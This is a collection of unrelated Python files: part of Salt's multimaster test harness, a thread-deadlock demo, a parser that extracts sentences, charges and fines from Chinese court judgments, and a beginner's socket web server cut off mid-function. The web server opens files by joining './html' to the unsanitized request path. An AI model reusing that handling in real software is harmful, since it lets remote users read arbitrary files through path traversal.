daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='sub-salt-master/{}'.format(self.mm_sub_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.mm_sub_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_SUB_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting second salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting second salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.mm_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.mm_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.mm_sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.mm_sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_SUB_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def wait_for_minions(self, start, timeout, sleep=5):
'''
Ensure all minions and masters (including sub-masters) are connected.
'''
success = [False] * len(self.master_targets)
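# success holds one flag per configured master; the loop keeps issuing 'test.ping'
# until each flag is set (all expected minions responded) or the timeout elapses.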
while True:
for num, client in enumerate(self.clients):
if success[num]:
continue
try:
ret = self.client.run_job('*', 'test.ping')
except salt.exceptions.SaltClientError:
ret = None
if ret and 'minions' not in ret:
continue
if ret and sorted(ret['minions']) == sorted(self.minion_targets):
success[num] = True
continue
if all(success):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
@property
def clients(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a later stage. If it were created in `__enter__`, as it
previously was, it would not receive the master events.
'''
if 'runtime_clients' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_clients'] = OrderedDict()
runtime_clients = RUNTIME_VARS.RUNTIME_CONFIGS['runtime_clients']
for mopts in self.master_targets:
if mopts['id'] in runtime_clients:
continue
runtime_clients[mopts['id']] = salt.client.get_local_client(mopts=mopts)
return runtime_clients
@property
def client(self):
return self.clients['mm-master']
@classmethod
def transplant_configs(cls, transport='zeromq'):
os.makedirs(RUNTIME_VARS.TMP_MM_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR)
print(' * Transplanting multimaster configuration files to \'{0}\''.format(
RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
# Primary master in multimaster environment
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_master')))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['config_dir'] = RUNTIME_VARS.TMP_MM_CONF_DIR
master_opts['root_dir'] = os.path.join(TMP, 'rootdir-multimaster')
master_opts['pki_dir'] = 'pki'
file_tree = {
'root_dir': os.path.join(FILES, 'pillar', 'base', 'file_tree'),
'follow_dir_links': False,
'keep_newline': True,
}
master_opts['ext_pillar'].append({'file_tree': file_tree})
# Secondary master in multimaster environment
sub_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
sub_master_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_sub_master')))
sub_master_opts['known_hosts_file'] = tests_known_hosts_file
sub_master_opts['cachedir'] = 'cache'
sub_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_master_opts['config_dir'] = RUNTIME_VARS.TMP_MM_SUB_CONF_DIR
sub_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-multimaster')
sub_master_opts['pki_dir'] = 'pki'
sub_master_opts['ext_pillar'].append({'file_tree': copy.deepcopy(file_tree)})
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(real_prefix, 'Scripts', 'virtualenv.exe')
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get('PATH')
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ['PATH'] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which('virtualenv')
if path is not None:
# Restore previous environ PATH
os.environ['PATH'] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to both masters
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_minion')))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['config_dir'] = RUNTIME_VARS.TMP_MM_CONF_DIR
minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-multimaster')
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
if virtualenv_binary:
minion_opts['venv_bin'] = virtualenv_binary
# This sub_minion also connects to both masters
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR,
'mm_sub_minion')))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_MM_SUB_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-multimaster')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
if virtualenv_binary:
sub_minion_opts['venv_bin'] = virtualenv_binary
if transport == 'raet':
master_opts['transport'] = 'raet'
master_opts['raet_port'] = 64506
sub_master_opts['transport'] = 'raet'
sub_master_opts['raet_port'] = 64556
minion_opts['transport'] = 'raet'
minion_opts['raet_port'] = 64510
sub_minion_opts['transport'] = 'raet'
sub_minion_opts['raet_port'] = 64520
# syndic_master_opts['transport'] = 'raet'
if transport == 'tcp':
master_opts['transport'] = 'tcp'
sub_master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = sub_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = sub_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, sub_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
for opts_dict in (master_opts, sub_master_opts):
# We need to copy the extension modules into the new master root_dir or
# the extension_modules path will end up prefixed by that root_dir
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
sub_master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, sub_master_opts, minion_opts, sub_minion_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
conf['runtests_log_level'] = os.environ.get('TESTS_MIN_LOG_LEVEL_NAME') or 'debug'
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
computed_config = copy.deepcopy(master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(master_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(sub_master_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(minion_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(sub_minion_opts), wfh, default_flow_style=False)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'master'))
sub_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'minion'))
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'minion'))
RUNTIME_VARS.RUNTIME_CONFIGS['mm_master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_sub_master'] = freeze(sub_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_sub_minion'] = freeze(sub_minion_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(sub_master_opts['pki_dir'], 'minions'),
os.path.join(sub_master_opts['pki_dir'], 'minions_pre'),
os.path.join(sub_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(sub_master_opts['pki_dir'], 'minions_denied'),
os.path.join(sub_master_opts['cachedir'], 'jobs'),
os.path.join(sub_master_opts['cachedir'], 'raet'),
os.path.join(sub_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(sub_master_opts['pki_dir'], 'accepted'),
os.path.join(sub_master_opts['pki_dir'], 'rejected'),
os.path.join(sub_master_opts['pki_dir'], 'pending'),
os.path.join(sub_master_opts['cachedir'], 'raet'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['cachedir'], 'raet'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['cachedir'], 'raet'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
sub_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.mm_master_opts = master_opts
cls.mm_sub_master_opts = sub_master_opts
cls.mm_minion_opts = minion_opts
cls.mm_sub_minion_opts = sub_minion_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
@classmethod
def config_location(cls):
return (RUNTIME_VARS.TMP_MM_CONF_DIR, RUNTIME_VARS.TMP_MM_SUB_CONF_DIR)
|
thread_deadlock.py
|
""" thread deadlock demo """
import threading
import time
counter1_lock = threading.Lock()
counter2_lock = threading.Lock()
counter1 = 2
counter2 = 4
def task_one() -> None:
""" task one """
global counter1
global counter2
with counter1_lock:
time.sleep(1)
with counter2_lock:
x = counter1
y = counter2
x = x - 1
y = y - 1
counter1 = x
counter2 = y
def task_two() -> None:
""" task two """
global counter1
global counter2
# Acquire the locks in the opposite order from task_one; together with the
# sleep this reliably produces the deadlock this demo is meant to show.
with counter2_lock:
time.sleep(1)
with counter1_lock:
x = counter1
y = counter2
x = x - 1
y = y - 1
counter1 = x
counter2 = y
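# Note (added commentary): the usual remedy is to have every thread acquire the
# locks in one fixed global order (e.g. always counter1_lock before
# counter2_lock), or to guard both counters with a single lock; either change
# removes the deadlock and lets the join() calls below return.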
print(f"start counter 1: {counter1}")
print(f"start counter 2: {counter2}")
thread1 = threading.Thread(target=task_one)
thread1.start()
thread2 = threading.Thread(target=task_two)
thread2.start()
thread1.join()
thread2.join()
print(f"end counter 1: {counter1}")
print(f"end counter 2: {counter2}")
|
draw_out.py
|
# coding: UTF-8
import os
import json
import re
# in_path = r"D:\work\law_pre\test\in"
# out_path = r"D:\work\law_pre\test\out"
in_path = r"/disk/mysql/law_data/formed_data"
out_path = r"/disk/mysql/law_data/critical_data"
mid_text = u" _(:з」∠)_ "
title_list = ["docId", "caseNumber", "caseName", "spcx", "court", "time", "caseType", "bgkly", "yuanwen", "document",
"cause", "docType", "keyword", "lawyer", "punishment", "result", "judge"]
accusation_file = r"/home/zhx/law_pre/data_processor/accusation_list2.txt"
accusation_f = open(accusation_file, "r", encoding='utf8')
accusation_list = json.loads(accusation_f.readline())
# accusation_list = []
# for line in accusation_f:
# accusation_list.append(line[:-1])
num_file = 20
num_process = 4
num_list = {
u"〇": 0,
u"\uff2f": 0,
u"\u3007": 0,
u"\u25cb": 0,
u"\uff10": 0,
u"\u039f": 0,
u'零': 0,
"O": 0,
"0": 0,
u"一": 1,
u"元": 1,
u"1": 1,
u"二": 2,
u"2": 2,
u"两": 2,
u'三': 3,
u'3': 3,
u'四': 4,
u'4': 4,
u'五': 5,
u'5': 5,
u'六': 6,
u'6': 6,
u'七': 7,
u'7': 7,
u'八': 8,
u'8': 8,
u'九': 9,
u'9': 9,
u'十': 10,
u'百': 100,
u'千': 1000,
u'万': 10000
}
num_str = ""
for x in num_list:
num_str = num_str + x
def parse_date_with_year_and_month_begin_from(s, begin, delta):
# erf = open("error.log", "a")
pos = begin + delta
num1 = 0
while s[pos] in num_list:
if s[pos] == u"十":
if num1 == 0:
num1 = 1
num1 *= 10
elif s[pos] == u"百" or s[pos] == u"千" or s[pos] == u"万":
# print("0 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num1 = num1 + num_list[s[pos]]
pos += 1
num = 0
if s[pos] == u"年":
num2 = 0
pos += 1
if s[pos] == u"又":
pos += 1
while s[pos] in num_list:
if s[pos] == u"十":
if num2 == 0:
num2 = 1
num2 *= 10
elif s[pos] == u"百" or s[pos] == u"千" or s[pos] == u"万":
# print("1 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num2 = num2 + num_list[s[pos]]
pos += 1
if s[pos] == u"个":
pos += 1
if num2 != 0 and s[pos] != u"月":
# print("2 " + s[begin - 10:pos + 20], file=erf)
return None
num = num1 * 12 + num2
else:
if s[pos] == u"个":
pos += 1
if s[pos] != u"月":
# print("3 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num = num1
pos += 1
# print(num,s[x.start():pos])
return num
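# Worked example (added for clarity): for a judgment fragment such as
# u"...有期徒刑三年又六个月..." with begin at the start of u"有期徒刑" and
# delta=len(u"有期徒刑"), the function returns 3 * 12 + 6 = 42, i.e. the term
# expressed in months.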
def parse_term_of_imprisonment(data):
result = {}
if "PJJG" in data["document"]:
s = data["document"]["PJJG"].replace('b', '')
# 有期徒刑 (fixed-term imprisonment)
youqi_arr = []
pattern = re.compile(u"有期徒刑")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"有期徒刑"))
if not (data is None):
youqi_arr.append(data)
# 拘役 (criminal detention)
juyi_arr = []
pattern = re.compile(u"拘役")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"拘役"))
if not (data is None):
juyi_arr.append(data)
# 管制 (public surveillance)
guanzhi_arr = []
pattern = re.compile(u"管制")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"管制"))
if not (data is None):
guanzhi_arr.append(data)
# 无期 (life imprisonment)
forever = False
if s.count("无期徒刑") != 0:
forever = True
# 死刑 (death penalty)
dead = False
if s.count("死刑") != 0:
dead = True
result["youqi"] = youqi_arr
result["juyi"] = juyi_arr
result["guanzhi"] = guanzhi_arr
result["wuqi"] = forever
result["sixing"] = dead
return result
def dfs_search(s, x, p, y):
if p >= len(x):
return s.count(y) != 0
if x[p] == "[":
pp = p
while x[pp] != "]":
pp += 1
subs = x[p + 1:pp].split(u"、")
for z in subs:
if dfs_search(s, x, pp + 1, y + z):
return True
if dfs_search(s, x, pp + 1, y + x[p + 1:pp]):
return True
else:
return False
else:
return dfs_search(s, x, p + 1, y + x[p])
def check(x, s):
return dfs_search(s, x, 0, "")
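# Rough illustration of the bracket expansion above (added commentary): with a
# pattern like u"[甲、乙]罪", check() returns True when the text contains
# u"甲罪", u"乙罪", or the literal u"甲、乙罪".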
def parse_name_of_accusation(data):
if "PJJG" in data["document"]:
s = data["document"]["PJJG"]
result = []
for x in accusation_list:
if check(x, s):
result.append(x.replace("[", "").replace("]", ""))
# print(result)
# if len(result) == 0:
# print(s)
return result
else:
return []
key_word_list = [u"第", u"条", u"款", u"、", u",", u"(", u")", u"之"]
def get_number_from_string(s):
# Convert a string of Chinese and/or Arabic numerals into an integer.
for x in s:
if not (x in num_list):
print(s)
raise ValueError("unexpected character in numeral string: " + x)
value = 0
try:
value = int(s)
except ValueError:
nowbase = 1
addnew = True
for a in range(len(s) - 1, -1, -1):
if s[a] == u'十':
if nowbase >= 10000:
nowbase = 100000
else:
nowbase = 10
addnew = False
elif s[a] == u'百':
if nowbase >= 10000:
nowbase = 1000000
else:
nowbase = 100
addnew = False
elif s[a] == u'千':
if nowbase >= 10000:
nowbase = 10000000
else:
nowbase = 1000
addnew = False
elif s[a] == u'万':
nowbase = 10000
addnew = False
else:
value = value + nowbase * num_list[s[a]]
nowbase = nowbase * 10
addnew = True
if not (addnew):
value += nowbase
return value
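# Worked example (added for clarity): get_number_from_string(u"三千五百")
# returns 3500, while a plain digit string such as u"2000" is handled directly
# by the int() branch.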
def get_one_reason(content, rex):
pos = rex.start()
law_name = rex.group(1)
nows = rex.group().replace(u"(", u"").replace(u")", u"")
# print(nows)
result = []
p = 0
while nows[p] != u"》":
p += 1
while nows[p] != u"第":
p += 1
tiao_num = 0
kuan_num = 0
add_kuan = True
zhiyi = 0
while p < len(nows):
nowp = p + 1
while not (nows[nowp] in key_word_list):
nowp += 1
num = get_number_from_string(nows[p + 1:nowp])
if nows[nowp] != u"款":
if not (add_kuan):
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": 0, "zhiyi": zhiyi})
tiao_num = num
add_kuan = False
if len(nows) > nowp + 2 and nows[nowp + 1] == u"之" and nows[nowp + 2] in num_list:
if num_list[nows[nowp + 2]] != 1:
print(nows)
# gg
zhiyi = num_list[nows[nowp + 2]]
else:
zhiyi = 0
else:
kuan_num = num
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": kuan_num, "zhiyi": zhiyi})
add_kuan = True
p = nowp
while p < len(nows) and nows[p] != u'第':
p += 1
if not (add_kuan):
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": 0, "zhiyi": zhiyi})
# print(result)
# if zhiyi == 1:
# gg
# print nows
# for x in result:
# print x["law_name"], x["tiao_num"], x["kuan_num"]
# print
return result
def sort_reason(l):
result_list = []
law_list = {}
for x in l:
z = x
if not (z["law_name"] in law_list):
law_list[z["law_name"]] = set()
law_list[z["law_name"]].add((z["tiao_num"], z["kuan_num"], z["zhiyi"]))
for x in law_list:
gg = []
for (y, z, r) in law_list[x]:
gg.append((y, z, r))
gg = list(set(gg))
gg.sort()
for (y, z, r) in gg:
result_list.append({"law_name": x, "tiao_num": y, "kuan_num": z, "zhiyi": r})
return result_list
def parse_name_of_law(data):
if not ("content" in data["document"]):
return []
key_word_str = num_str
for x in key_word_list:
key_word_str = key_word_str + x
rex = re.compile(u"《(中华人民共和国刑法)》第[" + key_word_str + u"]*[条款]")
result = rex.finditer(data["document"]["content"])
result_list = []
law_list = {}
for x in result:
y = get_one_reason(data["document"]["content"], x)
for z in y:
if not (z["law_name"] in law_list):
law_list[z["law_name"]] = set()
law_list[z["law_name"]].add((z["tiao_num"], z["kuan_num"], z["zhiyi"]))
for x in law_list:
for (y, z, r) in law_list[x]:
result_list.append({"law_name": x, "tiao_num": y, "kuan_num": z, "zhiyi": r})
return sort_reason(result_list)
def parse_money(data):
if not ("PJJG" in data["document"]):
return []
result_list = []
rex = re.compile(u"人民币([" + num_str + "]*)元")
result = rex.finditer(data["document"]["PJJG"])
for x in result:
datax = get_number_from_string(x.group(1))
result_list.append(datax)
# print(x.group(1), datax)
# print(result_list)
return result_list
def parse(data):
result = {}
# print(data["document"]["PJJG"])
result["term_of_imprisonment"] = parse_term_of_imprisonment(data)
result["name_of_accusation"] = parse_name_of_accusation(data)
result["name_of_law"] = parse_name_of_law(data)
result["punish_of_money"] = parse_money(data)
return result
def draw_out(in_path, out_path):
print(in_path)
inf = open(in_path, "r")
ouf = open(out_path, "w")
cnt = 0
for line in inf:
try:
data = json.loads(line)
if data["caseType"] == "1" and data["document"] != {} and "Title" in data["document"] and not (
re.search(u"判决书", data["document"]["Title"]) is None):
data["meta_info"] = parse(data)
print(json.dumps(data), file=ouf)
cnt += 1
if cnt % 500000 == 0:
print(in_path, cnt)
# break
except Exception as e:
print(e)
# gg
def work(from_id, to_id):
for a in range(int(from_id), int(to_id)):
print(str(a) + " begin to work")
draw_out(os.path.join(in_path, str(a)), os.path.join(out_path, str(a)))
print(str(a) + " work done")
if __name__ == "__main__":
import multiprocessing
process_pool = []
for a in range(0, num_process):
process_pool.append(
multiprocessing.Process(target=work, args=(a * num_file / num_process, (a + 1) * num_file / num_process)))
for a in process_pool:
a.start()
for a in process_pool:
a.join()
|
web_server_1.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# -*- coding: utf-8 -*-
import multiprocessing
import socket
import re
import time
import sys
sys.path.insert(0, "../../")
from mini_web.framework import mini_frame_1
class WSGIServer(object):
def __init__(self, ip, port):
# 1. Create the listening socket
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2. Bind the ip and port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
# 3. Switch the socket from active to passive (start listening)
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
# print(request)
request_lines = request.splitlines()  # when the client closes the connection, recv unblocks with an empty string and splitlines() yields an empty list
if not request_lines:
return
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2. Send back data in HTTP format
# 2.1 Static vs. dynamic resources; assume paths ending in .py are dynamic
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 Prepare the data to send to the browser -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 Prepare the data to send to the browser -- body
# response += "hahaha"
# Send the response header to the browser
new_socket.send(response.encode("utf-8"))
# Send the response body to the browser
new_socket.send(html_content)
else:
# 2.2 Handle a request for a dynamic resource
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
body = ""
# body = "This is a dynamic source web_app \r\n %s" % time.ctime()
if file_name == "/login.py":
body = mini_frame_1.login()
elif file_name == "/register.py":
body = mini_frame_1.register()
response = header + body
